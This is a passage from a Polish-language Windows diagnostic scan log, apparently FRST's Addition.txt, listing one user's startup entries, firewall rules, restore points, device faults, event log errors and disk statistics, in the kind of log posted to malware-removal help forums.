"C:\Users\Mateusz\AppData\Local\Temp\cis9443.exe" --PostUninstall {15198508-521A-4D69-8E5B-B94A6CCFF805} MSCONFIG\startupreg: CIS_{81EFDD93-DBBE-415B-BE6E-49B9664E3E82} => "C:\Users\Mateusz\AppData\Local\Temp\cis9443.exe" --PostUninstall {81EFDD93-DBBE-415B-BE6E-49B9664E3E82} MSCONFIG\startupreg: Gameo => C:\Users\Mateusz\AppData\Roaming\Gameo\gameo.exe "C:\Users\Mateusz\AppData\Roaming\Gameo\gameo.dat" mode:minimized MSCONFIG\startupreg: genesis_10271418 => "c:\users\mateusz\appdata\local\genesis_10271418\genesis_10271418.exe" /r MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe" MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe MSCONFIG\startupreg: RTHDVCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: Super-Charger => C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe MSCONFIG\startupreg: TBPanel => "C:\Program Files (x86)\EXPERTool\TBPanel.exe" /A ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{081C228F-38B4-4AF8-80B6-3A7DC7681E4E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{738C59B9-9879-4BA3-A149-36952088CAC6}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{E65D677A-A672-4051-912B-57C5A12E084A}] => (Allow) C:\Program Files\HP\HP Deskjet 2510 series\Bin\USBSetup.exe FirewallRules: [TCP Query User{E051E3AA-68B8-421D-993D-053C24EC4600}C:\program files (x86)\attack on pearl harbor\attack on pearl harbor.exe] => (Block) C:\program files (x86)\attack on pearl harbor\attack on pearl harbor.exe FirewallRules: [UDP Query User{25BCB3E2-94B3-42A0-8AC5-7875D1E9AFCA}C:\program files (x86)\attack on pearl harbor\attack on pearl harbor.exe] => (Block) C:\program files (x86)\attack on pearl harbor\attack on pearl harbor.exe FirewallRules: [{7F7FA260-C8DB-4842-B24B-F89D001FE53D}] => (Allow) C:\Program Files (x86)\Techland\Symulator Farmy 2013\agrarsimulator2013.exe FirewallRules: [{BDE7A872-BDF1-42DB-9A26-1DA0C94061A4}] => (Allow) C:\Program Files (x86)\Techland\Symulator Farmy 2013\iupdate.dll FirewallRules: [TCP Query User{175341D7-098C-4B88-B080-45DEC899DB1E}C:\program files (x86)\city interactive\esr\game.exe] => (Allow) C:\program files (x86)\city interactive\esr\game.exe FirewallRules: [UDP Query User{15776E54-60BF-4B78-92F7-83704739BE1F}C:\program files (x86)\city interactive\esr\game.exe] => (Allow) C:\program files (x86)\city interactive\esr\game.exe FirewallRules: [{5EDC4CAF-CC49-4C81-B666-B237EA061CE1}] => (Allow) C:\Program Files (x86)\Codemasters\DiRT2\dirt2_game.exe FirewallRules: [{E97612FA-EA8A-4F46-80A6-8D09EF3070FF}] => (Allow) C:\Program Files (x86)\Codemasters\DiRT2\dirt2_game.exe FirewallRules: [TCP Query User{5CE50282-0A8A-488A-B156-2C5FD45784DE}C:\program files (x86)\city interactive\esr\game.exe] => (Block) C:\program files (x86)\city interactive\esr\game.exe FirewallRules: [UDP Query User{E5CB413B-2DD8-4C58-9F06-7D7CA0A541B4}C:\program files (x86)\city interactive\esr\game.exe] => (Block) C:\program files (x86)\city interactive\esr\game.exe FirewallRules: [{CA0579FF-30D6-4CF9-B6C5-C279ACBF7B5A}] => (Allow) C:\Program Files (x86)\Agrar Simulator 2012 Demo\iupdate.dll FirewallRules: [{3AAF9ACD-7153-473B-9D4A-AFAE22D04CCB}] => (Allow) C:\Program Files (x86)\Agrar Simulator 2012 Demo\iupdate.dll FirewallRules: [{166ADF09-1F26-4332-8FD3-D1FE98D7C2EB}] => (Allow) C:\Program Files (x86)\Agrar Simulator 2012 Demo\farm2012.demo.dll FirewallRules: [{F646EA34-B2DA-4851-A1D9-05661D045161}] => (Allow) C:\Program Files (x86)\Agrar Simulator 2012 Demo\farm2012.demo.dll FirewallRules: [{0C4867FF-ABEE-4381-B9A8-5F85EC3CB23A}] => (Allow) C:\Program Files (x86)\Landwirtschafts Simulator 2011 Demo\FarmingSimulator2011.exe FirewallRules: [{3BFEA501-5C59-433E-8089-716D4A2E5266}] => (Allow) C:\Program Files (x86)\Landwirtschafts Simulator 2011 Demo\FarmingSimulator2011.exe FirewallRules: [{682CEA09-79DC-4FE8-A0C4-364EF4D9811E}] => (Allow) C:\Program Files (x86)\Landwirtschafts Simulator 2011 Demo\game.exe FirewallRules: [{6278EFB5-B436-4332-8887-1FB60A82745B}] => (Allow) C:\Program Files (x86)\Landwirtschafts Simulator 2011 Demo\game.exe FirewallRules: [TCP Query User{B23DF5A1-D1D0-4270-93ED-5E2B9369E47D}C:\program files (x86)\codemasters\dirt2\dirt2_game.exe] => (Block) C:\program files (x86)\codemasters\dirt2\dirt2_game.exe FirewallRules: [UDP Query User{8411B955-E73C-4689-BA23-BC509E32C388}C:\program files (x86)\codemasters\dirt2\dirt2_game.exe] => (Block) C:\program files (x86)\codemasters\dirt2\dirt2_game.exe FirewallRules: [TCP Query User{4210B1B9-81D0-498A-A38B-C0F1C9C28C31}C:\windows\syswow64\javaw.exe] => (Block) C:\windows\syswow64\javaw.exe FirewallRules: [UDP Query User{3AD0E230-0D5E-43FA-8176-17B556B082C6}C:\windows\syswow64\javaw.exe] => (Block) C:\windows\syswow64\javaw.exe FirewallRules: [{90DC39AE-56EE-4234-871A-D84B9ED6F906}] => (Allow) C:\Users\Mateusz\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe FirewallRules: [TCP Query User{07377377-0F5B-4D09-AAC8-A393F84B4DFC}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{541768F5-7AC4-45D9-BAD9-F05D296E7245}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [{3B4D75D3-D907-48B1-A8D0-4BAC4C186ABB}] => (Allow) C:\Users\Mateusz\Downloads\Polska_wypakuj.rar_downloader.exe FirewallRules: [{53A6B0E4-5222-4DCB-99F8-B6D7AEBE0AB3}] => (Allow) C:\Users\Mateusz\Downloads\Polska_wypakuj.rar_downloader.exe FirewallRules: [{F095393D-1332-42BE-B583-D95CFFF56123}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\FarmingSimulator2015.exe FirewallRules: [{09087C22-DCF5-4039-9874-F8C2B92BE187}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\FarmingSimulator2015.exe FirewallRules: [{005614F1-226E-4CCA-9C31-1CA03833C789}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\x86\FarmingSimulator2015Game.exe FirewallRules: [{C7E5020E-A48D-4C6A-A5E4-CAE9866D4B8B}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\x86\FarmingSimulator2015Game.exe FirewallRules: [{4E51B50B-CDB2-4B3E-BDF7-CD48E03B9FC3}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\x64\FarmingSimulator2015Game.exe FirewallRules: [{2EDB426C-FEEC-4463-9589-A500BCC7B947}] => (Allow) C:\Program Files (x86)\Farming Simulator 2015\x64\FarmingSimulator2015Game.exe FirewallRules: [{50A5D096-6CF6-48BC-A19C-00275E0229AB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{0634B9C9-7257-43D9-B9D6-19DCA8836F9C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{DB418FBC-5ACF-4EAE-9C94-B502B16C40D8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{D8EC19E0-66F5-4CAC-A703-76D8085125F5}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{36A73D0F-E002-4B46-97FA-F2CC32F158A9}] => (Allow) LPort=8317 ==================== Punkty Przywracania systemu ========================= 02-02-2016 19:31:38 Installing COMODO Internet Security Premium 02-02-2016 19:32:28 Instalacja pakietu sterownika urządzenia: COMODO Usługa sieciowa 03-03-2016 19:44:26 ComboFix created restore point 04-03-2016 20:46:22 Windows Update ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: F06DEFF2-5B9C-490D-910F-35D3A9119622 Description: F06DEFF2-5B9C-490D-910F-35D3A9119622 Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: F06DEFF2-5B9C-490D-910F-35D3A9119622 Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:25:13 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: ) Description: Nie można wyodrębnić listy głównej innych firm z pliku cab automatycznej aktualizacji z: , wystąpił błąd: Wymagany certyfikat jest poza okresem ważności, co wynika z weryfikacji bieżącego zegara systemowego lub sygnatury czasowej. . Error: (03/04/2016 09:23:11 PM) (Source: ISCTAgent) (EventID: 1000) (User: ) Description: netDetect::AOACNetDetect::Initialize Net Detect: Error Loading PROSet Library Error=0x2\n Error: (03/04/2016 09:22:16 PM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x80070005. Error: (03/04/2016 09:00:02 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program ByteFence.exe w wersji 2.1.1.0 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania Centrum akcji. Identyfikator procesu: 78 Godzina rozpoczęcia: 01d1764c5e86b4eb Godzina zakończenia: 105 Ścieżka aplikacji: C:\Program Files\ByteFence\ByteFence.exe Identyfikator raportu: 84969b61-e243-11e5-b465-d43d7e56b8e5 Dziennik System: ============= Error: (03/04/2016 09:25:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: %%2 Error: (03/04/2016 09:23:07 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: F06DEFF2-5B9C-490D-910F-35D3A9119622 Error: (03/04/2016 09:22:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Lightzap z powodu następującego błędu: %%2 Error: (03/04/2016 08:38:06 PM) (Source: Ntfs) (EventID: 55) (User: ) Description: Struktura systemu plików na dysku jest uszkodzona i nie nadaje się do użytku. Uruchom narzędzie chkdsk na woluminie C:. Error: (03/04/2016 08:32:37 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: %%2 Error: (03/04/2016 08:30:35 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: F06DEFF2-5B9C-490D-910F-35D3A9119622 Error: (03/04/2016 08:30:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Lightzap z powodu następującego błędu: %%2 Error: (03/04/2016 07:55:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: %%2 Error: (03/04/2016 07:53:28 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: F06DEFF2-5B9C-490D-910F-35D3A9119622 Error: (03/04/2016 07:52:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Lightzap z powodu następującego błędu: %%2 CodeIntegrity: =================================== Date: 2016-03-03 20:20:15.435 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-03-03 20:20:15.420 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2014-05-04 11:10:28.890 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\sfvfs02.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2014-05-04 11:10:28.888 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\System32\drivers\sfvfs02.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz Procent pamięci w użyciu: 35% Całkowita pamięć fizyczna: 8155.96 MB Dostępna pamięć fizyczna: 5245.51 MB Całkowita pamięć wirtualna: 16310.08 MB Dostępna pamięć wirtualna: 13045.46 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:293.94 GB) (Free:179.88 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)] Drive d: (DANE) (Fixed) (Total:371.38 GB) (Free:349.47 GB) NTFS Drive e: () (Fixed) (Total:33.31 GB) (Free:32.15 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 3EA94C02) Partition 1: (Active) - (Size=293.9 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=404.7 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================